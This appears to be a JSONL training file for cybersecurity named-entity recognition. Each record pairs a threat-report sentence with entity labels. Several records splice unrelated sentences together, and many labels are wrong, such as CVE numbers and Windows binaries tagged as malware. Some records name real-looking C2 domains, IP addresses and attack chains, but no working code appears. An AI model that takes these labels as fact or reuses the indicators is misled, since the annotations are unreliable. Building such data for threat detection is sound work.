The command and control ( C2 ) infrastructure chosen by APT10 for Operation Cloud Hopper is predominantly referenced using dynamic-DNS domains .", "spans": {"SYSTEM: Android": [[33, 40]], "MALWARE: BrainTest": [[57, 66]], "SYSTEM: Google Play": [[91, 102]], "THREAT_ACTOR: Patchwork": [[121, 130]], "MALWARE: MS PowerPoint document": [[139, 161]], "VULNERABILITY: CVE-2014-6352": [[187, 200]], "TOOL: C2": [[229, 231]], "THREAT_ACTOR: APT10": [[259, 264]], "MALWARE: dynamic-DNS domains": [[326, 345]]}, "info": {"id": "cyberner_stix_train_002901", "source": "cyberner_stix_train"}} {"text": "It is our hope that by providing additional indicators , end-point investigators and network defenders will be able to discover and mitigate more Shamoon2 related compromises .", "spans": {"MALWARE: Shamoon2": [[146, 154]]}, "info": {"id": "cyberner_stix_train_002902", "source": "cyberner_stix_train"}} {"text": "We have labeled the undetected Linux.Antd variants , Linux.GreedyAntd and classified the threat actor as Pacha Group . Based on file modification dates and timestamps of samples , it appears that the observed campaign was initiated in the middle of February 2016 , with the infrastructure taken offline at the start of March .", "spans": {"TOOL: Linux.GreedyAntd": [[53, 69]]}, "info": {"id": "cyberner_stix_train_002903", "source": "cyberner_stix_train"}} {"text": "26 of the targeted applications are from Italy , 25 are from the UK , 6 are from Germany , 5 are from France , and 3 are from Spain . Buckeye's exploit tool , EternalRomance , as well as EternalSynergy , can exploit the CVE-2017-0143 message type confusion vulnerability to perform memory corruption on unpatched victim computers . 
We have also seen Magic Hound using DropIt as a binder , specifically dropping a legitimate decoy executable along with the malicious executable onto the target host .", "spans": {"MALWARE: EternalRomance": [[159, 173]], "MALWARE: EternalSynergy": [[187, 201]], "MALWARE: CVE-2017-0143": [[220, 233]], "MALWARE: DropIt": [[368, 374]]}, "info": {"id": "cyberner_stix_train_002904", "source": "cyberner_stix_train"}} {"text": "In this case , the Dukes first attempted to infect large numbers of potential targets with CozyDuke ( and in a more obvious manner than previously seen ) .", "spans": {"THREAT_ACTOR: Dukes": [[19, 24]], "MALWARE: CozyDuke": [[91, 99]]}, "info": {"id": "cyberner_stix_train_002905", "source": "cyberner_stix_train"}} {"text": "That version flags messages \" containing certain language associated with junk texts and flags numbers associated with junk calls and not in a user 's contacts , '' the company says . Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . C2 : www.gokickes.com .", "spans": {"VULNERABILITY: CVE-2017-11882": [[250, 264]], "MALWARE: 'NavShExt.dll'": [[331, 345]], "MALWARE: iexplore.exe": [[376, 388]], "TOOL: C2": [[469, 471]], "DOMAIN: www.gokickes.com": [[474, 490]]}, "info": {"id": "cyberner_stix_train_002906", "source": "cyberner_stix_train"}} {"text": "] today test [ . KeyBoy provides basic backdoor functionality , allowing the operators to select from various capabilities used to surveil and steal information from the victim machine . 
This output reveals the following changes when compared with earlier variants : Microsoft also issued emergency Exchange Server updates for the following vulnerabilities : The activity reported by Microsoft aligns with our observations .", "spans": {"TOOL: KeyBoy": [[17, 23]], "ORGANIZATION: Microsoft": [[267, 276], [384, 393]], "SYSTEM: Exchange Server": [[299, 314]]}, "info": {"id": "cyberner_stix_train_002907", "source": "cyberner_stix_train"}} {"text": "After receiving the command , the Trojan attempts to execute it , before informing C & C of the execution status and any data received . CTU researchers have discovered numerous details about TG-3390 operations , including how the adversaries explore a network , move laterally , and exfiltrate data . Furthermore , based on the group ’s use of dated exploits as vectors that companies would have likely addressed with monitoring and regular patching schedules , it appears that they ’re going after enterprises who have yet to patch their systems , as well as companies with internet-facing systems with weak to no monitoring of traffic and activities . Last month , NoEscape posted 7 victims on their leak site .", "spans": {"ORGANIZATION: CTU": [[137, 140]], "THREAT_ACTOR: TG-3390": [[192, 199]], "MALWARE: NoEscape": [[668, 676]]}, "info": {"id": "cyberner_stix_train_002908", "source": "cyberner_stix_train"}} {"text": "We go through the Winnti implant installation process and explore how Windows Defender ATP can capture such attacker methods and tools and provide visualized contextual information that can aid in actual attack investigation and response .", "spans": {"MALWARE: Winnti": [[18, 24]], "TOOL: Windows Defender ATP": [[70, 90]]}, "info": {"id": "cyberner_stix_train_002909", "source": "cyberner_stix_train"}} {"text": "Check Point has worked closely with Google and at the time of publishing , no malicious apps remain on the Play Store . 
We believe that it is likely threat actors will continue development Bookworm , and will continue to use it for the foreseeable future . For example , the targeting of Angolan organizations in mid-2016 coincidences directly with the rise of Angola ’s oil business with China , which displaced Saudi Arabia as the number one exporter of crude oil to China at the time . WellMail has been observed using TCP port 25 , without using SMTP , to leverage an open port for secure command and control communications .", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "ORGANIZATION: Google": [[36, 42]], "SYSTEM: Play Store": [[107, 117]], "TOOL: Bookworm": [[189, 197]], "ORGANIZATION: Angolan organizations": [[288, 309]], "MALWARE: WellMail": [[489, 497]]}, "info": {"id": "cyberner_stix_train_002910", "source": "cyberner_stix_train"}} {"text": "The GeminiDuke infostealer has occasionally been wrapped with a loader that appears to be unique to GeminiDuke and has never been observed being used with any of the other Duke toolsets .", "spans": {"MALWARE: GeminiDuke": [[4, 14], [100, 110]], "THREAT_ACTOR: Duke": [[172, 176]]}, "info": {"id": "cyberner_stix_train_002911", "source": "cyberner_stix_train"}} {"text": "The Bart ransom screen was visually similar to Locky ’s but Bart had one important distinction : it could encrypt files without contacting a command and control server .", "spans": {"MALWARE: Bart": [[4, 8], [60, 64]], "MALWARE: Locky": [[47, 52]]}, "info": {"id": "cyberner_stix_train_002912", "source": "cyberner_stix_train"}} {"text": "Victim host must have a vulnerable version of Flash installed .", "spans": {"TOOL: Flash": [[46, 51]]}, "info": {"id": "cyberner_stix_train_002913", "source": "cyberner_stix_train"}} {"text": "We observed DDKONG in use between February 2017 and the present , while PLAINTEE is a newer addition with the earliest known sample being observed in October 2017 . 
Other groups , such as Buhtrap , Corkow and Carbanak , were already known to target and successfully steal money from financial institutions and their customers in Russia .", "spans": {"TOOL: DDKONG": [[12, 18]], "TOOL: PLAINTEE": [[72, 80]], "THREAT_ACTOR: groups": [[171, 177]], "THREAT_ACTOR: Buhtrap": [[188, 195]], "MALWARE: Corkow": [[198, 204]], "THREAT_ACTOR: Carbanak": [[209, 217]], "ORGANIZATION: financial institutions": [[283, 305]], "ORGANIZATION: customers": [[316, 325]]}, "info": {"id": "cyberner_stix_train_002914", "source": "cyberner_stix_train"}} {"text": "Aside from the competitive vendor naming landscape ( which I am not a fan of in cases on direct overlap , but which has more to say for itself when different methodologies are employed around similar observations ) , the distinction between FireEye and Dragos ’ approaches with respect to the “ TRITON actor ” comes down to fundamental philosophical differences in methodology .", "spans": {"ORGANIZATION: FireEye": [[241, 248]], "ORGANIZATION: Dragos": [[253, 259]], "MALWARE: TRITON": [[295, 301]]}, "info": {"id": "cyberner_stix_train_002915", "source": "cyberner_stix_train"}} {"text": "The malware authors seem to be putting a lot of effort into improving this malware , bundling it with numerous new upgrades that make it more sophisticated , evasive , and well-equipped . In a recent report , the FBI’s Internet Crime Complaint Center (IC3) reported that more than 20 , 000 businesses lost nearly $1.3 billion to BEC attacks in 2018 . 
Variants of malware and tools used by HIDDEN COBRA actors include Destover and Hangman .", "spans": {"ORGANIZATION: FBI’s": [[213, 218]], "ORGANIZATION: businesses": [[290, 300]], "THREAT_ACTOR: HIDDEN COBRA actors": [[389, 408]], "MALWARE: Destover": [[417, 425]], "MALWARE: Hangman": [[430, 437]]}, "info": {"id": "cyberner_stix_train_002916", "source": "cyberner_stix_train"}} {"text": "A separate malicious executable – 2DE25306A58D8A5B6CBE8D5E2FC5F3C5 ( vlc.exe ) – runs when the photograph is displayed , using the YouTube icon and calling out to several URLs on windowsnewupdates.com .", "spans": {"FILEPATH: 2DE25306A58D8A5B6CBE8D5E2FC5F3C5": [[34, 66]], "FILEPATH: vlc.exe": [[69, 76]], "TOOL: YouTube icon": [[131, 143]], "DOMAIN: windowsnewupdates.com": [[179, 200]]}, "info": {"id": "cyberner_stix_train_002917", "source": "cyberner_stix_train"}} {"text": "aux.robertstockdill.com kumar.pari@yandex.com Unknown April 1 , 2014 . ssl.2upgrades.com kumar.pari@yandex.com 176.58.96.234 July 5 , 2014 . 
bss.pvtcdn.com registrar@mail.zgsj.com 106.184.1.38 May 19 , 2015 .", "spans": {"DOMAIN: aux.robertstockdill.com": [[0, 23]], "EMAIL: kumar.pari@yandex.com": [[24, 45], [89, 110]], "DOMAIN: ssl.2upgrades.com": [[71, 88]], "IP_ADDRESS: 176.58.96.234": [[111, 124]], "DOMAIN: bss.pvtcdn.com": [[141, 155]], "EMAIL: registrar@mail.zgsj.com": [[156, 179]], "IP_ADDRESS: 106.184.1.38": [[180, 192]]}, "info": {"id": "cyberner_stix_train_002918", "source": "cyberner_stix_train"}} {"text": "In other cases , CozyDuke has been observed downloading and executing tools from other toolsets used by the Dukes such as OnionDuke , SeaDuke , and HammerDuke .", "spans": {"MALWARE: CozyDuke": [[17, 25]], "THREAT_ACTOR: Dukes": [[108, 113]], "MALWARE: OnionDuke": [[122, 131]], "MALWARE: SeaDuke": [[134, 141]], "MALWARE: HammerDuke": [[148, 158]]}, "info": {"id": "cyberner_stix_train_002919", "source": "cyberner_stix_train"}} {"text": "cmstp.exe system restart , cmstp.exe will be used to execute the SCT file indirectly through the INF file . 
Ploutus-D will load KXCashDispenserLib” library implemented by Kalignite Platform (K3A.Platform.dll) to interact with the XFS Manager and control the Dispenser (see Figure 13) .", "spans": {"MALWARE: cmstp.exe": [[0, 9], [27, 36]], "MALWARE: SCT file": [[65, 73]], "MALWARE: INF file": [[97, 105]], "FILEPATH: Ploutus-D": [[108, 117]], "FILEPATH: (K3A.Platform.dll)": [[190, 208]]}, "info": {"id": "cyberner_stix_train_002920", "source": "cyberner_stix_train"}} {"text": "The concurrent use of so many tools during a single intrusion suggests that the group could include threat actors with distinct tactics , roles , and tool preferences .", "spans": {}, "info": {"id": "cyberner_stix_train_002921", "source": "cyberner_stix_train"}} {"text": "As an example , we might see extraneous data in their SSL / TLS certificates that give away information about their provider or resources .", "spans": {}, "info": {"id": "cyberner_stix_train_002922", "source": "cyberner_stix_train"}} {"text": "In previous cases , the group used their malware toolsets interchangeably , as either the initial or a later-stage toolset in a campaign .", "spans": {}, "info": {"id": "cyberner_stix_train_002923", "source": "cyberner_stix_train"}} {"text": "( deprecated in API level 21 ) SYSTEM_ALERT_WINDOW - Allows the application to create windows shown on top of all other apps . Banks in countries such as Russia , the United Kingdom , the Netherlands , Spain , Romania , Belarus , Poland , Estonia , Bulgaria , Georgia , Moldova , Kyrgyzstan , Armenia , Taiwan and Malaysia have allegedly been targeted with spearphishing emails , luring victims into clicking malicious URLs and executing booby-trapped documents . 
Beginning in early March 2018 , Unit 42 started observing targeted attacks against Russian , Spanish and United States government agencies operating in Pakistan .", "spans": {"ORGANIZATION: Banks": [[127, 132]], "MALWARE: spearphishing emails": [[357, 377]], "ORGANIZATION: Unit 42": [[496, 503]], "ORGANIZATION: government agencies": [[583, 602]]}, "info": {"id": "cyberner_stix_train_002924", "source": "cyberner_stix_train"}} {"text": "NATO and EU member countries , as well as the United States , are of particular interest to the group .", "spans": {"ORGANIZATION: NATO": [[0, 4]], "ORGANIZATION: EU": [[9, 11]], "ORGANIZATION: United States": [[46, 59]]}, "info": {"id": "cyberner_stix_train_002925", "source": "cyberner_stix_train"}} {"text": "SMS Billing Carriers may partner with vendors to allow users to pay for services by SMS . Their targets are marine companies that operate in and around the South China Sea , an area of much Chinese interest . Help / ? Get help . Mandiant identified novel operational technology ( OT ) / industrial control system ( ICS)-oriented malware , which we track as COSMICENERGY , uploaded to a public malware scanning utility in December 2021 by a submitter in Russia .", "spans": {"ORGANIZATION: marine companies": [[108, 124]], "ORGANIZATION: Mandiant": [[229, 237]], "MALWARE: novel operational technology ( OT ) / industrial control system ( ICS)-oriented malware": [[249, 336]], "MALWARE: COSMICENERGY": [[357, 369]], "TOOL: public malware scanning utility": [[386, 417]]}, "info": {"id": "cyberner_stix_train_002926", "source": "cyberner_stix_train"}} {"text": "From early 2018 prior to May , “ Agent Smith ” hackers started to experiment with Bundle Feng Shui , the key tool which gives “ Agent Smith ” malware family capabilities to infect innocent apps on the device . Patchwork uses email as an entry point , which is why securing the email gateway is important . 
As mentioned , given the complexity of the attack chain and of Dexphot ’s persistence methods , we released a remediation solution that prevents re-infection by removing artifacts . Furthermore , as system and web server logs may have time or size limits enforced , we recommend preserving the following artifacts for forensic analysis : • At least 14 days of HTTP web logs from the directories ( include logs from all subdirectories ) •", "spans": {"MALWARE: Agent Smith": [[33, 44], [128, 139]], "THREAT_ACTOR: Patchwork": [[210, 219]], "MALWARE: Dexphot": [[369, 376]], "SYSTEM: system and web server logs": [[505, 531]]}, "info": {"id": "cyberner_stix_train_002927", "source": "cyberner_stix_train"}} {"text": "Versions overview The DenDroid code base was kept to such an extent that even the original base64-encoded password was kept . From September 2016 through late November 2016 , a threat actor group used both the Trochilus RAT and a newly idenfied RAT we've named MoonWind to target organizations in Thailand , including a utility organization . Similar to RIPTIDE and HIGHTIDE , the WATERSPOUT backdoor is an HTTP based backdoor that communicates with its C2 server . 
Enterprise T1199 Trusted Relationship APT29 has compromised IT , cloud services , and managed services providers to gain broad access to multiple customers for subsequent operations .", "spans": {"MALWARE: DenDroid": [[22, 30]], "TOOL: Trochilus RAT": [[210, 223]], "TOOL: RAT": [[245, 248]], "TOOL: MoonWind": [[261, 269]], "ORGANIZATION: utility organization": [[320, 340]], "MALWARE: RIPTIDE": [[354, 361]], "MALWARE: HIGHTIDE": [[366, 374]], "MALWARE: WATERSPOUT backdoor": [[381, 400]], "TOOL: C2": [[454, 456]], "THREAT_ACTOR: Trusted Relationship APT29": [[483, 509]], "SYSTEM: IT": [[526, 528]], "SYSTEM: cloud services": [[531, 545]], "SYSTEM: managed services providers": [[552, 578]]}, "info": {"id": "cyberner_stix_train_002928", "source": "cyberner_stix_train"}} {"text": "Then , in early May ( two days after the last malware sample was submitted ) the Palestinian Authority held local elections in the West Bank which were reportedly seen as a test for the Fatah party .", "spans": {"ORGANIZATION: Palestinian Authority": [[81, 102]], "ORGANIZATION: Fatah party": [[186, 197]]}, "info": {"id": "cyberner_stix_train_002929", "source": "cyberner_stix_train"}} {"text": "This has the same functionality as mcpef.apk . However , around a month ago , Rocke started targeting systems that run Jenkins by attempting to exploit CVE-2018-1000861 and CVE-2019-1003000 . Primarily focused on governments and military operations of countries with interests in the South China Sea , Moafee likely chooses its targets based on region 's rich natural resources .", "spans": {"THREAT_ACTOR: Rocke": [[78, 83]], "VULNERABILITY: CVE-2018-1000861": [[152, 168]], "VULNERABILITY: CVE-2019-1003000": [[173, 189]], "ORGANIZATION: governments": [[213, 224]], "THREAT_ACTOR: Moafee": [[302, 308]]}, "info": {"id": "cyberner_stix_train_002930", "source": "cyberner_stix_train"}} {"text": "“ Twitoor serves as another example of how cybercriminals keep on innovating their business , ” Stefanko continues . 
If Scattered Canary can be seen as a microcosm for the rapidly evolving organizations behind today’s most pernicious email scams , this report demonstrates that a much more holistic approach—one based on threat actor identity rather than type of fraudulent activity—is required to detect email fraud and protect organizations . We believe they started this watering hole campaign at the end of 2016 after their other operation was interrupted in South East Asia .", "spans": {"MALWARE: Twitoor": [[2, 9]], "THREAT_ACTOR: Scattered Canary": [[120, 136]]}, "info": {"id": "cyberner_stix_train_002931", "source": "cyberner_stix_train"}} {"text": "Click fraud apps The authors ' tactics evolved from advertisement spam to real PHA ( Click Fraud ) . This file requires the target to attempt to open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page . According to recent opinion polls , the Democratic Progressive Party ( DPP ) candidate Tsai Ing-wen is leading her opponents and is widely expected to win the election . Other Snort rules and detection content can prevent the execution of the malware used as the final payload .", "spans": {"MALWARE: .lnk file": [[154, 163]], "ORGANIZATION: Democratic Progressive Party": [[335, 363]], "ORGANIZATION: DPP": [[366, 369]]}, "info": {"id": "cyberner_stix_train_002932", "source": "cyberner_stix_train"}} {"text": "On the technical side , since mid-January Kaspersky researchers have been tracking an active Turla campaign targeting government bodies in Turkmenistan and Tajikistan . 
We have not yet identified FIN7’s ultimate goal in this campaign , as we have either blocked the delivery of the malicious emails or our FaaS team detected and contained the attack early enough in the lifecycle before we observed any data targeting or theft .", "spans": {"ORGANIZATION: Kaspersky": [[42, 51]], "THREAT_ACTOR: Turla": [[93, 98]], "ORGANIZATION: government": [[118, 128]], "THREAT_ACTOR: FIN7’s": [[196, 202]], "FILEPATH: malicious emails": [[282, 298]]}, "info": {"id": "cyberner_stix_train_002933", "source": "cyberner_stix_train"}} {"text": "It downloads one more archive and dynamically loads code from it . APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers . Targeted sectors of Molerats include governmental and diplomatic institutions , including embassies ; companies from the aerospace and defence Industries ; financial institutions ; journalists ; software developers .", "spans": {"THREAT_ACTOR: APT28": [[67, 72]], "VULNERABILITY: EternalBlue exploit": [[113, 132]], "TOOL: open source tool": [[141, 157]], "TOOL: Responder": [[158, 167]], "THREAT_ACTOR: Molerats": [[255, 263]], "ORGANIZATION: governmental": [[272, 284]], "ORGANIZATION: embassies": [[325, 334]], "ORGANIZATION: aerospace": [[356, 365]], "ORGANIZATION: defence Industries": [[370, 388]], "ORGANIZATION: financial institutions": [[391, 413]], "ORGANIZATION: journalists": [[416, 427]], "ORGANIZATION: software developers": [[430, 449]]}, "info": {"id": "cyberner_stix_train_002934", "source": "cyberner_stix_train"}} {"text": "These files have the capability to download and install malware , install proxy and Remote Access Trojans ( RATs ) , connect to command and control ( C2 ) servers to receive additional instructions , and modify the victim 's firewall to allow incoming connections . 
Threat actors have delivered Bookworm as a payload in attacks on targets in Thailand .", "spans": {"TOOL: RATs": [[108, 112]], "MALWARE: Bookworm": [[295, 303]]}, "info": {"id": "cyberner_stix_train_002935", "source": "cyberner_stix_train"}} {"text": "Since 2011 , the robbers had allegedly been stealing money directly from bank accounts in Russia and other countries of the Commonwealth of Independent States ( CIS ) by using a Trojan called Lurk . TG-3390 sends spearphishing emails with ZIP archive attachments .", "spans": {"TOOL: Trojan": [[178, 184]], "TOOL: Lurk": [[192, 196]], "THREAT_ACTOR: TG-3390": [[199, 206]], "TOOL: emails": [[227, 233]]}, "info": {"id": "cyberner_stix_train_002936", "source": "cyberner_stix_train"}} {"text": "It also appears the apps may still be in development or incubation , maybe waiting for a “ right time ” to inject the malicious codes . Recently Subaat drew our attention due to renewed targeted attack activity . but not least , Rhysida appears to have first popped up back in May , with several high - profile compromises posted on their leak site .", "spans": {"THREAT_ACTOR: Subaat": [[145, 151]], "MALWARE: Rhysida": [[229, 236]]}, "info": {"id": "cyberner_stix_train_002937", "source": "cyberner_stix_train"}} {"text": "The organization appears to be shut down , but the threat actors are still very active . In the case of this malware , the activity groups strongly associated with Winnti are BARIUM and LEAD . The IXESHE attackers almost always make use of compromised servers as command-and-control ( C&C ) servers . 
Over 5 years ago , we began tracking a new campaign that we called FakeUpdates ( also known as SocGholish ) that used compromised websites to trick users into running a fake browser update .", "spans": {"TOOL: Winnti": [[164, 170]], "TOOL: BARIUM": [[175, 181]], "TOOL: LEAD": [[186, 190]], "THREAT_ACTOR: IXESHE": [[197, 203]], "TOOL: command-and-control": [[263, 282]], "TOOL: C&C": [[285, 288]], "MALWARE: FakeUpdates": [[368, 379]], "MALWARE: SocGholish": [[396, 406]]}, "info": {"id": "cyberner_stix_train_002938", "source": "cyberner_stix_train"}} {"text": "This is done in the function initComponents . DLL hijacking techniques have been seen in the past with the APT15 group . The central directory it pertained to is the one in the second ZIP . But then , following an upsurge in attacks in the second half of 2014 , GReAT characterized MiniDuke , CosmicDuke and the actor ’s Nemesis Gemina project - targeting government , diplomatic , energy , military and telecom operators - as ‘ one of the world ’s most unusual APT operations ’ due to : • Its use of a customized backdoor written in Assembler using ‘ old school ’ virus writing techniques and habits • Stealthy transfer of updates as executables hidden inside GIF files ( a form of steganography )", "spans": {"THREAT_ACTOR: APT15 group": [[107, 118]], "ORGANIZATION: GReAT": [[262, 267]], "MALWARE: MiniDuke": [[282, 290]], "MALWARE: CosmicDuke": [[293, 303]], "ORGANIZATION: targeting government": [[346, 366]], "ORGANIZATION: diplomatic , energy , military and telecom operators": [[369, 421]]}, "info": {"id": "cyberner_stix_train_002939", "source": "cyberner_stix_train"}} {"text": "Regardless of the agency or unit tasked with this collection , the upcoming US election , and the associated candidates and parties are of critical interest to both hostile and friendly nation states .", "spans": {}, "info": {"id": "cyberner_stix_train_002940", "source": "cyberner_stix_train"}} {"text": "It also provides secure storage of 
passwords and other sensitive information .", "spans": {"ORGANIZATION: It": [[0, 2]]}, "info": {"id": "cyberner_stix_train_002941", "source": "cyberner_stix_train"}} {"text": "More recently , we have also seen an increase in activity targeting Ukraine .", "spans": {}, "info": {"id": "cyberner_stix_train_002942", "source": "cyberner_stix_train"}} {"text": "This indicates that multiple C2 servers were used in this campaign , but one ( 37.1.207.31 ) was the most heavily used . A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation . The malware is executed only for the following layout , the country is based on the Microsoft website : Cyberattacks can leave companies wondering how could this happen to us so , when these situations arise , it can help to know what might be motivating these attackers .", "spans": {"THREAT_ACTOR: OilRig group": [[179, 191]], "TOOL: QUADAGENT samples": [[201, 218]], "TOOL: Invoke-Obfuscation": [[281, 299]], "ORGANIZATION: Microsoft": [[386, 395]]}, "info": {"id": "cyberner_stix_train_002943", "source": "cyberner_stix_train"}} {"text": "EventBot has the ability to update its library or potentially even download a second library when given a command from the C2 . Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . 
Since at least 2013 , the Iranian threat group that FireEye tracks as APT33 has carried out a Cyber Espionage operation to collect information from defense , aerospace and petrochemical organizations .", "spans": {"MALWARE: EventBot": [[0, 8]], "VULNERABILITY: CVE-2017-11882": [[194, 208]], "MALWARE: 'NavShExt.dll'": [[275, 289]], "MALWARE: iexplore.exe": [[320, 332]], "ORGANIZATION: FireEye": [[465, 472]], "THREAT_ACTOR: APT33": [[483, 488]], "ORGANIZATION: defense": [[561, 568]], "ORGANIZATION: aerospace": [[571, 580]], "ORGANIZATION: petrochemical organizations": [[585, 612]]}, "info": {"id": "cyberner_stix_train_002944", "source": "cyberner_stix_train"}} {"text": "The stolen data fields are : Mobile - The infected device phone number and contact ’ s phone number Contacts - A headline used for the attacker to distinguish between the type of stolen information he gets Name - Contact ’ s full name ( Display name ) upCon ( upload contact ) function used for stealing contact list information . We will provide an analysis of the HyperBro tool in an upcoming section . Large-scale cyber espionage campaigns such as \" GhostNet \" .", "spans": {"ORGANIZATION: We": [[331, 333]], "MALWARE: HyperBro": [[366, 374]]}, "info": {"id": "cyberner_stix_train_002945", "source": "cyberner_stix_train"}} {"text": "Early in Q2 , Kaspersky identified an interesting Lazarus attack targeting a mobile gaming company in South Korea that we believe was aimed at stealing application source code . 
The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems .", "spans": {"ORGANIZATION: Kaspersky": [[14, 23]], "THREAT_ACTOR: Lazarus": [[50, 57]], "ORGANIZATION: mobile gaming": [[77, 90]], "FILEPATH: files": [[182, 187]], "VULNERABILITY: exploit": [[188, 195]], "TOOL: Microsoft Office": [[211, 227]], "VULNERABILITY: CVE-2012-0158": [[244, 257]]}, "info": {"id": "cyberner_stix_train_002946", "source": "cyberner_stix_train"}} {"text": "At a high level , hot patching can transparently apply patches to executables and DLLs in actively running processes , which does not happen with traditional methods of code injection such as CreateRemoteThread or WriteProcessMemory . Despite the fact that the Changing Information Technology Inc. certificate was revoked on July 4 , 2017 , the BlackTech group is still using it to sign their malicious tools .", "spans": {"MALWARE: CreateRemoteThread": [[192, 210]], "MALWARE: WriteProcessMemory": [[214, 232]]}, "info": {"id": "cyberner_stix_train_002947", "source": "cyberner_stix_train"}} {"text": "The second division , overseen by Lieutenant Colonel Sergey Aleksandrovich Morgachev , managed the development and maintenance of malware and hacking tools used by Unit 26165 , including the X-Agent \" implant \" .", "spans": {"THREAT_ACTOR: Unit 26165": [[164, 174]], "MALWARE: X-Agent": [[191, 198]]}, "info": {"id": "cyberner_stix_train_002948", "source": "cyberner_stix_train"}} {"text": "Those who already have read our previous articles about Zebrocy will notice that more or less the same kind of information is sent , over and over again by previous stages .", "spans": {"MALWARE: Zebrocy": [[56, 63]]}, "info": {"id": "cyberner_stix_train_002949", "source": "cyberner_stix_train"}} {"text": "Both the client and the server use the same code to serialize and encrypt the communications .", "spans": {"TOOL: server": [[24, 30]]}, "info": {"id": 
"cyberner_stix_train_002950", "source": "cyberner_stix_train"}} {"text": "Running successful big game hunting operations results in a higher average profit per victim , allowing adversaries like PINCHY SPIDER and their partners to increase their criminal revenue quickly . Based on the profile of the victims and the type of information targeted by the attackers , Symantec believes that Butterfly is financially motivated , stealing information it can potentially profit from .", "spans": {"ORGANIZATION: Symantec": [[291, 299]]}, "info": {"id": "cyberner_stix_train_002951", "source": "cyberner_stix_train"}} {"text": "The documents that exploit CVE2017-11882 download another payload — an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script — from the server , which is executed accordingly by the command-line tool mshta.exe . However , full details on ALLANITE and other group tools , techniques , procedures , and infrastructure is available to network defenders via Dragos WorldView .", "spans": {"VULNERABILITY: CVE2017-11882": [[27, 40]], "TOOL: HTML Application": [[71, 87]], "MALWARE: HTA": [[90, 93]], "MALWARE: mshta.exe": [[223, 232]], "ORGANIZATION: Dragos WorldView": [[377, 393]]}, "info": {"id": "cyberner_stix_train_002952", "source": "cyberner_stix_train"}} {"text": "Among multiple sub-domains , “ ad.a * * * d.org ” and “ gd.a * * * d.org ” both historically resolved to the same suspicious IP address . Once an exploitable page is identified , Clever Kitten will attempt to upload a PHP backdoor to gain remote access to the system . The monitoring components also detect freshly launched cmd.exe processes and terminate them promptly . 
In response to this activity , we built threat hunting campaigns designed to identify additional Exchange Server abuse .", "spans": {"FILEPATH: cmd.exe": [[324, 331]]}, "info": {"id": "cyberner_stix_train_002953", "source": "cyberner_stix_train"}} {"text": "The Sofacy group remains a persistent global threat .", "spans": {"THREAT_ACTOR: Sofacy": [[4, 10]]}, "info": {"id": "cyberner_stix_train_002954", "source": "cyberner_stix_train"}} {"text": "PlugX is a modular structured malware that has many different operational plugins such as communication compression and encryption , network enumeration , files interaction , remote shell operations and more . Hackers target primarily companies in Russia and CIS countries , though it is noticed that the amount of attacks targeting the USA has increased 5 times since 2011 .", "spans": {"MALWARE: PlugX": [[0, 5]], "ORGANIZATION: primarily companies": [[225, 244]]}, "info": {"id": "cyberner_stix_train_002955", "source": "cyberner_stix_train"}} {"text": "] com , 31.214.157 [ . China Chopper contains a remote shell (Virtual Terminal) function that has a first suggested command of netstat an|find ESTABLISHED . First released in 2005 , the tool has gone unchanged since 2008 with v ersion 2.3.2 .", "spans": {"MALWARE: China Chopper": [[23, 36]]}, "info": {"id": "cyberner_stix_train_002956", "source": "cyberner_stix_train"}} {"text": "More information on this threat actor is found in our report , APT37 (Reaper): The Overlooked North Korean Actor . The usefulness of flare-qdb can be seen in cases such as loops dealing with strings .", "spans": {"THREAT_ACTOR: APT37": [[63, 68]], "FILEPATH: flare-qdb": [[133, 142]]}, "info": {"id": "cyberner_stix_train_002957", "source": "cyberner_stix_train"}} {"text": "Figure 2 . 
To mitigate the threat of the described campaign , security teams can consider blocking access to the C2 server 103.236.150.14 and , where applicable , ensure that the Microsoft Security Update KB2553204 is installed in order to patch the CVE-2017-11882 vulnerability . The samples we have analyzed were actually quite large , each of them about 60 MB . In terms of detection , organizations should look to align their detection strategy with the MITRE ATTCK Framework to help detect a ransomware attack before its too late .", "spans": {"VULNERABILITY: CVE-2017-11882": [[250, 264]]}, "info": {"id": "cyberner_stix_train_002958", "source": "cyberner_stix_train"}} {"text": "Like many threat groups , TG-3390 conducts strategic web compromises ( SWCs ) , also known as watering hole attacks , on websites associated with the target organization 's vertical or demographic to increase the likelihood of finding victims with relevant information . Intelligence suggests the group has been active since at least 2014 and is presently operating in multiple facilities targeting safety systems beyond Triconex .", "spans": {"THREAT_ACTOR: TG-3390": [[26, 33]], "TOOL: SWCs": [[71, 75]]}, "info": {"id": "cyberner_stix_train_002959", "source": "cyberner_stix_train"}} {"text": "Google Cloud Messaging is designed to send short message ( up to 4 KB ) to mobile devices via Google services . Thrip seemed to be mainly interested in the operational side of the company . Using this module by default indicates that the attackers are interested in stealing information from the victims ’ machines . 
Who is The Chaos Creator , and what else transpired between Harrison and Ashley Madison prior to his death ?", "spans": {"SYSTEM: Google Cloud Messaging": [[0, 22]], "ORGANIZATION: Google": [[94, 100]], "ORGANIZATION: The Chaos Creator": [[324, 341]], "ORGANIZATION: Harrison": [[377, 385]], "ORGANIZATION: Ashley Madison": [[390, 404]]}, "info": {"id": "cyberner_stix_train_002960", "source": "cyberner_stix_train"}} {"text": "For each mounted drive , Ryuk calls GetDriveTypeW to determine the drive 's type . ScarCruft is a relatively new APT group ; victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania .", "spans": {"TOOL: Ryuk": [[25, 29]], "TOOL: GetDriveTypeW": [[36, 49]], "THREAT_ACTOR: ScarCruft": [[83, 92]]}, "info": {"id": "cyberner_stix_train_002961", "source": "cyberner_stix_train"}} {"text": "Data collected by Secureworks incident response ( IR ) analysts and analyzed by CTU researchers indicates that GOLD LOWELL extorts money from victims using the custom SamSam ransomware . 
